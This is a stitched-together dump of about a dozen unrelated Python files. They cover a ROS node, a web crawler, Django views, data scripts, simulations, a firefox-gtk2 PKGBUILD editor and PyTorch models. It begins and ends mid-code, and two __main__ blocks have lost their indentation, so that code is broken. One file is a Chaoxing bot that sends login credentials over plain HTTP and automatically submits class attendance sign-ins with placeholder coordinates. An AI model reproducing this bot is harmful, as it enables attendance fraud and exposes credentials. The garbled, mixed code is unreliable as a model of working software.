                self.first_loop = False
                self.data_collection = []
                rospy.loginfo('Please step onto the pad and press enter when done')
                #The script will not continue unless the user presses enter
                user = raw_input()
            else:
                self.calibrated = True
        self.previous_forces = forces
    def feedback(self):
        # Placeholder: post-calibration feedback not implemented yet.
        rospy.loginfo('Feedback time')
if __name__ == '__main__':
    # Build the node, then hand control to the ROS event loop.
    begin = Calibrate_and_Measure()
    try:
        rospy.spin()
    except rospy.ROSInterruptException:
        pass
#coding:utf-8
import os
import pickle
import amipy
import w3lib.url as urltool
class Request(object):
    """A crawl request bound to an amipy Spider.

    Validates and normalizes its parameters, canonicalizes the URL, loads
    cookies into the spider's session, and inherits unset options from the
    spider's settings.  Instances are orderable so they can live in a
    priority queue.
    """
    def __init__(self,spider,url,*,
                 callback=None,
                 headers=None,
                 errback=None,
                 excback=None,
                 params=None,
                 proxy=None,
                 proxy_auth=None,
                 kwargs_cb=None,
                 cookies=None,
                 data=None,
                 down_type=None,
                 filter=None,
                 fingerprint=None,
                 timeout=None,
                 obey_robots_txt=None,
                 ignore = False,
                 save_path=None,
                 encoding='utf-8',
                 method='GET',
                 retry=0,
                 priority=0,
                 delay = 0,):
        # --- validation -------------------------------------------------
        assert isinstance(spider, amipy.Spider),\
            f'the Request should be bounded to a Spider,' \
            f'got "{type(spider).__name__}".'
        assert isinstance(kwargs_cb,dict) or kwargs_cb is None,\
            'params from Request to success callback should be a dict.'
        assert isinstance(proxy_auth, dict) or proxy_auth is None, \
            'Auth for proxy should be a dict.'
        # Fall back to the spider's default handlers when none are given.
        callback = callback if callback else spider.parse
        errback = errback if errback else spider.error
        excback = excback if excback else spider.exception
        assert callback or kwargs_cb is not None,\
            'there is no callback function for the Request.'
        assert callable(callback),\
            f'callback should be a coroutine function ,' \
            f'got "{type(callback).__name__}".'
        assert callable(errback) or errback is None, \
            f'errback should be a coroutine function,' \
            f'got "{type(errback).__name__}".'
        assert callable(excback) or excback is None, \
            f'excback should be a coroutine function,' \
            f'got "{type(excback).__name__}" .'
        assert method.strip().upper() in \
            ('GET','POST','HEAD','PUT','DELETE','UPDATE'), \
            "the method of a Request should be one of " \
            "the ['GET','POST','HEAD','PUT','DELETE','UPDATE']. "
        # --- plain attributes -------------------------------------------
        self.spider = spider
        self.callback = callback
        self.errback = errback
        self.excback = excback
        self.encoding = encoding
        self.priority = priority
        self.method = method
        self.data = data
        self.params = params
        self.fingerprint = fingerprint
        self.headers = headers
        self.proxy = proxy
        self.proxy_auth = proxy_auth
        self._ignore = ignore
        self.save_path = save_path
        self._tried = 0          # retry attempts made so far
        self.session = spider.session
        # --- options defaulting to the spider's settings ----------------
        self.filter = bool(filter) if filter != None \
            else spider.settings.BLOOMFILTER_URL_ON
        self.obey_robots_txt = bool(obey_robots_txt) if \
            obey_robots_txt != None else spider.settings.ROBOTS_TXT_OBEY
        self.kwargs_cb = {} if not kwargs_cb \
            else kwargs_cb
        self.down_type = down_type if down_type != None\
            else spider.settings.DEFAULT_DOWNLOAD_TYPE
        self.retry = retry if retry !=0 \
            else spider.settings.REQUEST_RETRY
        self.delay = delay if delay !=0 \
            else spider.settings.REQUEST_DELAY
        self.timeout = timeout if timeout is not None \
            else spider.settings.REQUEST_TIMEOUT
        self._set_url(url)
        self._load_cookies(cookies)
        self._set_delegate(spider.binding_hub.delegate)
    def _set_url(self,url):
        # Canonicalize for deduplication/fingerprinting.
        self.url = urltool.canonicalize_url(
            urltool.safe_download_url(url),encoding=self.encoding)
    def _load_cookies(self,cookies):
        """Load cookies from a dict, or from a pickle file path (str)."""
        if isinstance(cookies,dict):
            self.session.cookie_jar.update_cookies(cookies)
        elif isinstance(cookies,str):
            if os.path.exists(cookies):
                with open(cookies,'rb') as f:
                    rawdata = pickle.load(f)
                # First try the raw pickled mapping; fall back to flattening a
                # nested {domain: {name: morsel}} structure into {name: value}.
                # NOTE(review): the bare excepts silently drop unreadable
                # cookie files — consider logging.
                try:
                    self.session.cookie_jar.update_cookies(rawdata)
                except:
                    try:
                        _c_cookie = {j.key:j.value for i in rawdata.values()
                                     for j in i.values()}
                        self.session.cookie_jar.update_cookies(_c_cookie)
                    except:
                        return
    def _set_delegate(self,func):
        self.delegate_func = func
    @property
    def delegate_func(self):
        return self._func
    @delegate_func.setter
    def delegate_func(self,func):
        # Delegate may be None or any callable; anything else is a bug.
        if func is None:
            self._func = None
        elif not callable(func):
            raise TypeError('delegate func should be callable,got "%s".'\
                %type(func).__name__)
        else:
            self._func = func
    @property
    def url(self):
        return self.__url
    @url.setter
    def url(self,url):
        #only starts with schema:file,http,https allowed to be a valid url
        if not urltool.is_url(url):
            raise ValueError('Not a valid url for Request.Got:%s'%url)
        else:
            self.__url = urltool.safe_download_url(url)
    def __str__(self):
        return '<Request obj at %s [ spider=%s url=%s ] >'\
            %(hex(id(self)),self.spider.name,self.url)
    def __gt__(self, other):
        # NOTE(review): a *lower* priority number compares as "greater" here
        # (min-queue style) — confirm this matches the scheduler's ordering.
        return self.spider > other.spider or \
            self.priority < other.priority
|
from yoamisafe import views
from django.conf.urls import patterns, include, url
# NOTE(review): patterns() was removed in Django 1.10, so this module targets
# legacy Django (<= 1.9).
urlpatterns = patterns("",
    # NOTE(review): Django matches patterns against the path *without* its
    # leading '/', so r'/temp' (unanchored) matches any URL containing '/temp'
    # but never '/temp' itself, and r'^/map/.*' can never match at all.
    # Confirm the intended patterns (e.g. r'^temp$', r'^map/.*').
    url(r'/temp', views.temp, name='temp'),
    url(r'^/map/.*', views.map, name='map'),
)
|
from django.shortcuts import render
from weddingApp.models import RSVP
from django.views.generic import (TemplateView,ListView,
DetailView,CreateView,
UpdateView,DeleteView)
# Create your views here.
class HomeView(TemplateView):
    """Render the static home/landing page."""
    template_name = 'weddingApp_home.html'
class RSVPView(TemplateView):
    """Render the static RSVP page."""
    template_name = 'weddingApp_rsvp.html'
class InfoView(TemplateView):
    """Render the static wedding-information page."""
    template_name = 'weddingApp_info.html'
class GalleryView(TemplateView):
    """Render the static photo-gallery page."""
    template_name = 'weddingApp_gallery.html'
class ShareView(TemplateView):
    """Render the static share page."""
    template_name = 'weddingApp_share.html'
class ThanksView(TemplateView):
    """Render the static thank-you page."""
    template_name = 'weddingApp_thanks.html'
class RSVPCreateView(CreateView):
    """Form view that creates an RSVP record, exposing every model field."""
    model = RSVP
    fields = "__all__"
|
import requests, json, time
# Module-wide state for the auto-sign-in monitor.
coursedata = []    # course dicts {'courseid','name','classid'} filled by get_coursedata()
activeList = []    # last activity list fetched by taskactivelist()
course_index = 0   # NOTE(review): never used below — dead state?
speed = 10         # NOTE(review): never used below — dead state?
uid=0              # account _uid, set as a side effect of get_cookie()
status = 0
status2 = 0        # NOTE(review): never used below — dead state?
activates = []     # activity ids already signed (or attempted), to avoid repeats
quantity = 0       # number of courses discovered by get_coursedata()
a = 1              # flag: set to 2 when a sign-in was just handled this cycle
# Fetch the login cookie
def get_cookie(user_id,password):
    """Log in to chaoxing and return the session cookie header string.

    Side effect: stores the account's _uid cookie into the module-level ``uid``.
    NOTE(review): credentials travel in a GET query string over plain HTTP.
    """
    global uid
    url="http://i.chaoxing.com/vlogin?passWord="+str(password)+"&userName="+str(user_id)
    res=requests.get(url)
    # cookies = requests.utils.dict_from_cookiejar(res.cookies)
    cookie_value = ''
    for key, value in res.cookies.items():
        if key=="_uid":
            uid=value
        cookie_value += key + '=' + value + ';'
    # print (cookie_value)
    return (cookie_value)
# Shared request headers for all API calls.
# NOTE(review): get_cookie("","") runs at *import time* with empty credentials —
# a real account must be filled in, and this performs a network request on load.
headers = {
    "Cookie": get_cookie("",""),
    "User-Agent": "Mozilla/5.0 (iPad; CPU OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 ChaoXingStudy/ChaoXingStudy_3_4.3.2_ios_phone_201911291130_27 (@Kalimdor)_11391565702936108810"
}
def taskactivelist(courseId, classId):
    """Fetch the activity list of one class and sign in to any open sign-in task.

    An activity with activeType == 2 and status == 1 is an open sign-in; its
    aid is extracted from the activity URL and handed to sign() unless it was
    already processed (tracked in the global ``activates``).
    NOTE(review): the log line below reads the *global* ``i`` set by the main
    polling loop — this only works when called from that loop.
    """
    global activeList, a
    url = "https://mobilelearn.chaoxing.com/ppt/activeAPI/taskactivelist?courseId=" + str(courseId) + "&classId=" + str(
        classId) + "&uid=" + uid
    res = requests.get(url, headers=headers)
    data = json.loads(res.text)
    activeList = data['activeList']
    # print(activeList)
    for item in activeList:
        # Entries without 'nameTwo' carry no status text; skip them.
        if ("nameTwo" not in item):
            continue
        print('1')
        if (item['activeType'] == 2 and item['status'] == 1):
            signurl = item['url']
            aid = getvar(signurl)
            # print('2')
            if (aid not in activates):
                print('[签到]', i, '号课查询到待签到活动 活动名称:%s 活动状态:%s 活动时间:%s aid:%s' % (
                    item['nameOne'], item['nameTwo'], item['nameFour'], aid))
                sign(aid, uid)
                a = 2
                # print('调用签到函数')
def getvar(url):
    """Extract the value of the 'activePrimaryId' parameter from *url*.

    The string is split naively on '&' and '='; returns the sentinel 'ccc'
    when the parameter is not present as a bare key.
    """
    for chunk in url.split("&"):
        pieces = chunk.split("=")
        if pieces[0] == "activePrimaryId":
            return pieces[1]
    return "ccc"
def sign(aid, uid):
    """Submit the sign-in request for activity *aid* on behalf of user *uid*.

    Whether the server answers "success" or not, the aid is recorded in the
    global ``activates`` so it will not be retried.
    """
    global status, activates
    url = "https://mobilelearn.chaoxing.com/pptSign/stuSignajax?activeId=" + aid + "&uid=" + uid + "&clientip=&latitude=-1&longitude=-1&appType=15&fid=0"
    res = requests.get(url, headers=headers)
    if (res.text == "success"):
        print("用户:" + uid + " 签到成功!")
        activates.append(aid)
        status = 2
    else:
        print("签到失败")
        activates.append(aid)
def get_coursedata():
    """Fetch the account's course list and populate ``coursedata``/``quantity``.

    Each channel entry that contains a course contributes one dict with its
    courseid, name and classid; ``quantity`` ends up as the number of courses.
    """
    global quantity
    url = "http://mooc1-api.chaoxing.com/mycourse/backclazzdata?view=json&rss=1"
    res = requests.get(url, headers=headers)
    cdata = json.loads(res.text)
    if (cdata['result'] != 1):
        print("课程列表获取失败")
    for item in cdata['channelList']:
        # Skip channels that are not courses.
        if ("course" not in item['content']):
            continue
        pushdata = {}
        pushdata['courseid'] = item['content']['course']['data'][0]['id']
        pushdata['name'] = item['content']['course']['data'][0]['name']
        # pushdata['imageurl'] = item['content']['course']['data'][0]['imageurl']
        pushdata['classid'] = item['content']['id']
        coursedata.append(pushdata)
    print("获取成功:")
    index = 0
    for item in coursedata:
        print(str(index) + ".课程名称:" + item['name'])
        index += 1
        quantity += 1
get_coursedata()
# Poll every course forever, sleeping 10s between courses; ``a == 2`` means a
# sign-in was just handled by taskactivelist(), otherwise report "no activity".
while 1:
    for i in range(quantity):
        taskactivelist(coursedata[i]['courseid'], coursedata[i]['classid'])
        time.sleep(10)
        if a == 2:
            a = 0
        else:
            print('[签到]监控运行中,', i, '号课未查询到签到活动')
|
import pandas as pd
def get_data_by_year(year_list):
    """Load the babynames files for the given years into one DataFrame.

    Reads names/yob<year>.txt (columns: Name, Gender, Qty) for each year,
    tags every row with its Year, and concatenates the results.

    :param year_list: iterable of years (ints) to load
    :return: DataFrame with columns Name, Gender, Qty, Year
    """
    df_list = list()
    for year in year_list:
        # Forward slash works on both POSIX and Windows; the original literal
        # 'names\yob...' contained a backslash and only resolved on Windows.
        file_path = f'names/yob{year}.txt'
        df = pd.read_csv(file_path, names=['Name', 'Gender', 'Qty'])
        df['Year'] = year
        df_list.append(df)
    return pd.concat(df_list)
def count_top3(year_list):
    """Return the three names with the highest single-year counts."""
    frame = get_data_by_year(year_list)
    ranked = frame.sort_values(by='Qty', ascending=False)
    return ranked['Name'].iloc[:3].to_list()
def count_dynamics(year_list):
    """Per-gender counts of name rows for each requested year.

    Returns {'F': [...], 'M': [...]} where each list holds the number of
    distinct name rows per year, in the grouped (sorted) year order.
    """
    frame = get_data_by_year(year_list)
    counts = frame.groupby(
        by=['Gender', 'Year']
    ).agg({
        'Name' : 'count'
    }).reset_index()
    return {
        gender: counts.loc[counts['Gender'] == gender, 'Name'].to_list()
        for gender in ('F', 'M')
    }
if __name__ == "__main__":
# получаем топ-3 имен за указанные года
count_top3([1900, 1950, 2000])
# получаем динамику за указанные года
count_dynamics([1900, 1950, 2000])
|
from .fetch import db_fetch, GatherInfo, ContentInfo, Statistic
from .telephone import db_tel, CompanyInfo, StatInfo
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 5 16:10:03 2019
@author: andreascazzosi
"""
# =============================================================================
# Class
# =============================================================================
class Player:
    """A shooter that holds an opinion and a hit probability.

    Every instance registers itself in the class-level ``players_list``.
    Several helpers are deliberately written without ``self`` and are meant
    to be invoked on the class itself (e.g. ``Player.checkopinion()``).
    """

    players_list = []          # registry of all live players
    change_probability = True  # if True, a hit also copies the shooter's probability

    def checkopinion():
        """True when every registered player shares the first player's opinion."""
        return all(
            player.getopinion() == Player.players_list[0].getopinion()
            for player in Player.players_list
        )

    def countforopinion(opinion):
        """Number of registered players currently holding *opinion*."""
        return sum(1 for player in Player.players_list
                   if player.getopinion() == opinion)

    def __init__(self, probability = 0, opinion = 0):
        self.probability = probability
        self.opinion = opinion
        Player.players_list.append(self)

    def delete(self):
        """Unregister this player from the class registry."""
        Player.players_list.remove(self)

    def findopponent(self, opponents):
        """Index in *opponents* of the highest-probability player whose opinion differs."""
        rivals = [(index, foe.probability)
                  for index, foe in enumerate(opponents)
                  if foe.opinion != self.opinion]
        best_index, _ = max(rivals, key=lambda pair: pair[1])
        return best_index

    def shooting(self, opponent):
        """Shoot at *opponent*; on a hit the opponent adopts this player's
        opinion (and probability, when change_probability is enabled)."""
        import random
        if self.probability >= random.random():
            opponent.setopinion(self.opinion)
            if Player.getchange_probability():
                opponent.setprobability(self.probability)

    def setchange_probability(new_value):
        Player.change_probability = new_value

    def getchange_probability():
        return Player.change_probability

    def delete_list(list_):
        """Unregister every player in *list_*."""
        for member in list_:
            member.delete()

    def delete_matrix(matrix):
        """Unregister every player in a 2-D collection of players."""
        for row in matrix:
            for member in row:
                member.delete()

    def setprobability(self, probability):
        self.probability = probability

    def setopinion(self, opinion):
        self.opinion = opinion

    def getopinion(self):
        return self.opinion

    def getprobability(self):
        return self.probability
|
#!/usr/bin/env python3
from types import SimpleNamespace
from lilaclib import *
# Mutable scratch state shared between pre_build() and post_build().
g = SimpleNamespace()
# lilac: chroot/repository the package is built in.
build_prefix = 'extra-x86_64'
def pre_build():
    """Fetch the official firefox PKGBUILD and rewrite it for a GTK2 build.

    edit_file() yields the PKGBUILD line by line and whatever this loop
    print()s becomes the new file content, so `continue` drops a line and an
    extra print() inserts one.  (Semantics assumed from lilaclib — confirm.)
    """
    g.oldfiles = clean_directory()
    g.files = download_official_pkgbuild('firefox')
    for line in edit_file('PKGBUILD'):
        if line.startswith('pkgname='):
            # Rename the package.
            line = 'pkgname=firefox-gtk2'
        elif line.startswith('depends=('):
            # Strip the gtk3 dependency (quoted and unquoted spellings) and
            # declare this package a drop-in replacement for firefox.
            line = line.replace("'gtk3' ", "")
            line = line.replace("gtk3 ", "")
            line = """conflicts=('firefox')
provides=("firefox=${pkgver}-${pkgrel}")\n""" + line
        elif '$pkgname' in line:
            line = line.replace('$pkgname', 'firefox')
        # .mozconfig
        elif 'MOZ_REQUIRE_SIGNING' in line:
            # Drop the line entirely — an unofficial build cannot be signed.
            continue
        elif '--enable-official-branding' in line:
            # Switch the default toolkit to GTK2 next to the branding option.
            print('ac_add_options --enable-default-toolkit=cairo-gtk2')
        print(line)
def post_build():
    """Commit the regenerated packaging files to the lilac git repository."""
    git_rm_files(g.oldfiles)
    git_add_files(g.files)
    git_commit()
# lilac entry point when run standalone.
if __name__ == '__main__':
    single_main()
|
import asyncio
from datetime import datetime
from buffered_channel import BufferedChannel
from event import Event
class Stream:
    """A node in a push-based async dataflow network.

    Each Stream wraps an async ``update`` callable.  Nodes are linked with
    to(); events travel through per-node BufferedChannels and run() polls
    every node reachable in the network.
    """
    def __init__(self, update, interval=0, name=None):
        self.update = update        # async callable invoked per event
        self.sources = []           # upstream streams feeding data_chan
        self.sink = None            # single downstream stream, set by to()
        self.data_chan = BufferedChannel()
        self.interval = interval # the interval (ms) to check the dataChan
        self.cancelled = False      # set True to stop poll_data()
        self.name = name
    def to(self, sink):
        '''
        Connect a sink to this stream
        '''
        self.sink = sink
        self.sink.sources.append(self)
    async def run(self):
        '''
        Start polling for new data on the data channel (for all streams in the network)
        '''
        # NOTE(review): passing bare coroutines to asyncio.wait is deprecated
        # since Python 3.8 (removed in 3.11) — wrap in tasks when upgrading.
        streams = self.to_list()
        await asyncio.wait([stream.poll_data() for stream in streams])
    async def propagate(self):
        # Role is inferred from topology: producer (no sources), transformer
        # (sources and a sink), or consumer (sources only).
        if not self.sources: # if it is a producer
            if not self.sink:
                await self.process(None)
            else:
                coroutine = self.process(None)
                await self.output(coroutine)
        elif self.sources and self.sink: # if it is a consumer and producer
            event = await self.data_chan.get()
            await self.output(self.process(event))
        else: # if it is a consumer
            event = await self.data_chan.get()
            await self.process(event)
    async def process(self, value):
        '''
        Wrapper for the self.update function that adds metric information as an object
        '''
        return await self.update(value)
    async def output(self, coroutine):
        '''
        Wraps a self.process call to take metrics of its running time
        '''
        start_time = datetime.utcnow()
        value = await coroutine
        now = datetime.utcnow()
        event = Event(value, self, now - start_time, now)
        # NOTE(review): put() is not awaited — assumes BufferedChannel.put is
        # synchronous; confirm against buffered_channel's API.
        self.sink.data_chan.put(event)
    async def poll_data(self):
        # Drive this node until cancelled; interval is interpreted in ms.
        while not self.cancelled:
            await self.propagate()
            await asyncio.sleep(self.interval/1000)
    def to_list(self, skip=None):
        '''
        Collect every stream reachable from this one (upstream first), without
        visiting any node twice.
        '''
        if not skip:
            skip = set()
        if self in skip:
            return []
        skip.add(self)
        streams = []
        for source in self.sources:
            streams = source.to_list(skip) + streams
        streams.append(self)
        if self.sink:
            streams += self.sink.to_list(skip)
        return streams
|
def diagonalDifference(arr):
    """Absolute difference between the sums of a square matrix's two diagonals."""
    size = len(arr)
    primary = sum(row[idx] for idx, row in enumerate(arr))
    secondary = sum(row[size - 1 - idx] for idx, row in enumerate(arr))
    return abs(primary - secondary)
|
import departing_and_reducing_stopwords as DARS
import numpy as np
from TFIDF import TextVectorizer as TV
from BSKM import *
import os
import time
from sklearn.feature_extraction.text import TfidfVectorizer
import pickle
#from compiler.ast import flatten
def getfiles(path):
    """Return the entries of directory *path* (thin wrapper over os.listdir)."""
    entries = os.listdir(path)
    return entries
#getfiles(r'E:\temp\program\python\git_2020_dachuang\dataset_mc\dataset_mc\bishe200m5')
def preprocessing(filenames):
    """For each corpus file: TF-IDF vectorize, run GSBPSO feature selection,
    and write the reduced feature set to '<name>file_reduce.txt'.

    NOTE(review): the loop variable ``i`` (the current filename) is reused by
    the inner index loops below; it works only because all filename-derived
    paths are computed before those loops run — rename when touching this.
    """
    for i in filenames:
        time_start = time.time()
        prefix = 'E:/temp/program/python/git_2020_dachuang/experiment/'
        output_file_name = prefix + i
        input_prefix = 'E:/temp/program/python/git_2020_dachuang/dataset_mc/dataset_mc/bishe200m5/'
        input_text = input_prefix + i
        # Project TextVectorizer: corpus + document + stopword handling.
        tv = TV('E:\\temp\\program\\python\\git_2020_dachuang\\dataset_mc\\dataset_mc\\bishe200m5corpus_result.txt',input_text,'stopwords.txt','corpus_output.txt',output_file_name,max_df=0.15,min_df=0.0002)
        tv.init_corpus_and_text()
        tv.fitting()
        tv.transforming()
        wordlist = tv.getWordList()
        weightlist = tv.getWeightList()
        dict_ = tv.getDict()
        file1 = prefix + i + 'file1.txt'
        file2 = prefix + i + 'file2.txt'
        file3 = prefix + i + 'file_reduce.txt'
        tv.writeInFile(file1)
        tv.writeTfidfInFileSorted(file2)
        textvector,feature_name,feature_tfidf = tv.getTextVector()
        dim = len(feature_name)
        #print(dim)
        # GSBPSO hyper-parameters (inertia, acceleration, etc.).
        size = dim
        w = 1.4
        c1=c2=1.2
        gama = 0.9
        theta = 5
        max_vel = 1
        iter_num = 100
        gsbpso = GSBPSO(dim,size,iter_num,max_vel,theta,feature_tfidf,gama,c1=c1,c2=c2,w=w)
        fitness_value_list,best_position = gsbpso.update()
        print(best_position)
        print(fitness_value_list[-1])
        # best_position is a 0/1 mask over features; keep the selected indices.
        selected_feature = []
        for i in range(len(best_position)):
            if best_position[i] == 1:
                selected_feature.append(i)
        print(selected_feature)
        list_feature = []
        for i in selected_feature:
            print(feature_name[i])
            list_feature.append(feature_name[i])
        # Persist the reduced feature names, space-separated.
        with open(file3,'w',encoding='utf-8') as f3:
            for i in list_feature:
                f3.write(i)
                f3.write(' ')
        time_end = time.time()
        print('time cost:',time_end-time_start,'s')
def labeling(x):
    """Append each row's index as a trailing label column and return an ndarray.

    Note: mutates the caller's lists in place — every row of *x* gains its
    integer row index as a last element before conversion.
    """
    for index, row in enumerate(x):
        row.append(int(index))
    return np.array(x)
def getAllFeaturesAssemble(reduce_filenames):
    """Collect the first line of every '*.txtfile_reduce' output file.

    Returns a list of single-element lists (one reduced-feature string per
    document).  Filenames are matched by their text after the first '.', so
    only names like '<doc>.txtfile_reduce' are read.
    """
    t1 = time.time()
    prefix = 'E:/temp/program/python/git_2020_dachuang/experiment/'
    features_list = []
    for i in reduce_filenames:
        file_name = prefix + i
        each_featrue = []
        tmp_prefix = i.split('.')[1]
        if tmp_prefix == 'txtfile_reduce':
            with open(file_name,'r',encoding='utf-8') as f:
                #f.readline()
                # Only the first line is read — the reduce files are one line.
                each_featrue.append(f.readline())
                print(each_featrue)
                features_list.append(each_featrue)
        else:
            continue
    t2 = time.time()
    print('cost:',t2-t1,'s')
    return features_list
if __name__ == "__main__":
#这两步用于对文本数据进行GSBPSO处理 得到约简后的文本特征集
#------------------------------------------------------------------
#filenames = getfiles(r'E:\temp\program\python\git_2020_dachuang\dataset_mc\dataset_mc\bishe200m5'
#preprocessing(filenames)
#------------------------------------------------------------------
#下面步骤用于提取处理后的文本特征集合
#------------------------------------------------------------------
#reduce_filenames = getfiles(r'E:\temp\program\python\git_2020_dachuang\experiment')
#features_list = getAllFeaturesAssemble(reduce_filenames)
#features_list = np.array(features_list)
#np.save('features_list.npy',features_list)
#print(features_list)
#print(features_list)
#------------------------------------------------------------------
#下面步骤用于将特征集合编码 用于下一步的聚类
features_list_tmp = np.load('features_list.npy')
features_list = []
features_list.extend([x[0] for x in features_list_tmp])
tfidf_vec = TfidfVectorizer()
tfidf_mat = tfidf_vec.fit_transform(features_list)
#print(tfidf_mat.toarray())
#print(np.shape(tfidf_mat.toarray()))
tfidf_mat_array = tfidf_mat.toarray()
tfidf_mat_array = labeling(tfidf_mat_array.tolist())
#bskm = BSKM(tfidf_mat_array,5,300,0.0001)
#bskm.fit()
#print(bskm.centers)
#centers = bskm.centers
#clf = bskm.clf
#------------------------------------------------------------------
#保存分好的簇以及各个样本归属情况
#------------------------------------------------------------------
#with open('centers.txt','wb') as f1:
# pickle.dump(centers,f1)
#with open('clf.txt','wb') as f2:
#f2.write(str(clf))
# pickle.dump(clf,f2)
bskm = BSKM(tfidf_mat_array,5,300,0.0001)
bskm.fit()
print(bskm.centers)
print(bskm.clf_label)
centers = bskm.centers
clf = bskm.clf
clf_label = bskm.clf_label
#------------------------------------------------------------------
#保存分好的簇以及各个样本归属情况
#------------------------------------------------------------------
with open('centers.txt','wb') as f1:
pickle.dump(centers,f1)
with open('clf.txt','wb') as f2:
#f2.write(str(clf))
pickle.dump(clf,f2)
with open('clf_labeled.txt','wb') as f3:
pickle.dump(clf_label,f3)
with open('centers.txt','rb+') as f1:
centers_load = pickle.load(f1)
with open('clf.txt','rb+') as f2:
clf_load = pickle.load(f2)
with open('clf_labeled.txt','rb+') as f3:
clf_labeled_load = pickle.load(f3)
#print(type(centers_load))
#print(centers_load)
#print(type(clf_load))
#print(clf_load)
#np.save('centers.npy',centers) 导致保存的不是dict 弃用
#np.save('clf.npy',clf)
#------------------------------------------------------------------
#centers_load = np.load('centers.npy',allow_pickle=True)
#clf_load = np.load('clf.npy',allow_pickle=True)
#print('dict = ',centers_load)
#print('clf = ',clf_load)
#------------------------------------------------------------------
#print(label)
#print(centers)
#print(clf)
#------------------------------------------------------------------
#------------------------------------------------------------------
#print(clf_load)
#print(len(tfidf_mat_array.tolist()))
|
import sys
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
class EmbeddingNet(nn.Module):
    """Backbone + projection head mapping images to L2-normalized embeddings.

    The backbone is a torchvision model with its classification layer removed;
    a small MLP (fc1 -> fc2) projects the pooled features down to
    ``embedding_len`` dimensions, and the result is L2-normalized.
    """
    def __init__(self, network='cifar_resnet50', pretrained=False, embedding_len=128, gap=True, freeze_parameter=False):
        """Build the backbone and the projection head.

        Args:
            network: backbone identifier — see select_network().
            pretrained: load ImageNet weights for the backbone.
            embedding_len: dimensionality of the output embedding.
            gap: unused; kept for backward compatibility with existing callers.
            freeze_parameter: if True, forward() skips the projection head and
                returns normalized backbone features directly.
        """
        super(EmbeddingNet, self).__init__()
        self.freeze_parameter = freeze_parameter
        model = self.select_network(network, pretrained, extract_feature=freeze_parameter)
        modules = list(model.children())
        self.convnet = nn.Sequential(*modules)
        # Projection head: 2048 -> 1024 -> embedding_len.
        self.fc1 = nn.Linear(2048, 1024)
        self.fc1_bn = nn.BatchNorm1d(1024)
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(1024, embedding_len)
        # Adapter for backbones emitting 512x7x7 maps (vgg19_bn): 25088 -> 2048.
        self.fc0 = nn.Linear(25088, 2048)
        self.fc0_bn = nn.BatchNorm1d(2048)
        self.relu0 = nn.ReLU()
    def forward(self, x):
        """Extract an L2-normalized embedding.
        Args:
            x: [batch_size, 3, H, W] image batch
        Returns:
            output: [batch_size, embedding_len] normalized embeddings
        """
        output = self.convnet(x)
        output = output.view(output.size(0), -1)
        if not self.freeze_parameter:
            # vgg19_bn features flatten to 25088; adapt them to the 2048-dim
            # input the projection head expects.
            if output.size(1) == 25088:
                output = self.fc0(output)
                output = self.fc0_bn(output)
                output = self.relu0(output)
            output = self.fc1(output)
            output = self.fc1_bn(output)
            output = self.relu(output)
            output = self.fc2(output)
        output = self.normalize(output)
        return output
    def get_embedding(self, x):
        """Alias for forward(); embeddings ARE the network output."""
        return self.forward(x)
    def normalize(self, x):
        """L2-normalize each row of x.
        Args:
            x: [b, embedding_len]
        NOTE(review): an all-zero row would divide by zero — assumed not to
        occur in practice; confirm before relying on it.
        """
        x_l2 = torch.norm(x, dim=1, p=2, keepdim=True)
        x = x / x_l2.expand_as(x)
        return x
    def select_network(self, network, pretrained, extract_feature=False):
        """Build the requested backbone (classification layer removed).

        Args:
            network: one of resnet50 / resnet152 / densenet161 / vgg19_bn /
                cifar_resnet50; 'SE-Net' is not implemented.
            pretrained: load ImageNet weights.
            extract_feature: for vgg19_bn, skip the adaptive-pooling tail.
        """
        if network == 'resnet50':
            print('using {}'.format('resnet50'))
            model = models.resnet50(pretrained=pretrained)
            model = nn.Sequential(*(list(model.children())[:-1]))
        elif network == 'resnet152':
            print('using {}'.format('resnet152'))
            model = models.resnet152(pretrained=pretrained)
            model = nn.Sequential(*(list(model.children())[:-1]))
        elif network == 'densenet161':
            print('using {}'.format('densenet161'))
            # BUG FIX: this branch previously instantiated resnet152 (copy-paste
            # error) while reporting densenet161.  Build the real DenseNet-161
            # trunk: features + ReLU + global average pool.
            # NOTE(review): DenseNet-161 yields 2208-dim features, which does
            # not match fc1's 2048-dim input — confirm head sizing before
            # training with this backbone.
            densenet = models.densenet161(pretrained=pretrained)
            model = nn.Sequential(densenet.features,
                                  nn.ReLU(inplace=True),
                                  nn.AdaptiveAvgPool2d(1))
        elif network == 'SE-Net':
            print('using {}'.format('SE-Net'))
            # BUG FIX: previously fell through with `model` unbound, so the
            # trailing `return model` raised UnboundLocalError; fail explicitly.
            raise NotImplementedError('SE-Net backbone is not implemented')
        elif network == 'vgg19_bn':
            print('using {}'.format('vgg19 feature'))
            vgg19_bn = models.vgg19_bn(pretrained=pretrained)
            model = vgg19_bn.features
            if not extract_feature:
                model = nn.Sequential(
                    *(list(model.children())),
                    nn.AdaptiveAvgPool2d(output_size=(7, 7)),
                )
        elif network == 'cifar_resnet50':
            print('using {}'.format('cifar_resnet50'))
            # Adapt ResNet-50 to small (32x32) inputs: stride-1 stem and the
            # max-pool layer (children()[3]) removed.
            model = models.resnet50(pretrained=pretrained)
            model.conv1.stride = 1
            model = nn.Sequential(
                *(list(model.children())[0:3]),
                *(list(model.children())[4:-2]),
                nn.AdaptiveAvgPool2d(1)
            )
        else:
            # Unknown backbone name: abort (sys.exit kept to preserve the
            # original contract for calling scripts).
            sys.exit(-1)
        return model
    def freeze_model(self, model):
        """Freeze all parameters of *model* (no gradients) and return it."""
        # BUG FIX: message previously printed a literal, unfilled '{}'
        # ('Frezzing model:{}'); report the model's class name instead.
        print('Freezing model: {}'.format(type(model).__name__))
        for param in model.parameters():
            param.requires_grad = False
        return model
class ClassificationNet(nn.Module):
    """Classifier head stacked on an embedding network.

    Runs the embedding network, applies a ReLU, and maps the embedding to
    class logits with a single linear layer.
    """

    def __init__(self, embedding_net, n_classes=10, embedding_len=128):
        super(ClassificationNet, self).__init__()
        self.embedding_net = embedding_net
        self.n_classes = n_classes
        self.nonlinear = nn.ReLU()
        self.classification = nn.Linear(embedding_len, n_classes)

    def forward(self, x):
        """Return class logits of shape [batch, n_classes]."""
        logits = self.classification(self.nonlinear(self.embedding_net(x)))
        return logits

    def get_embedding(self, x):
        """Return the ReLU-activated embedding of *x*."""
        embedded = self.embedding_net(x)
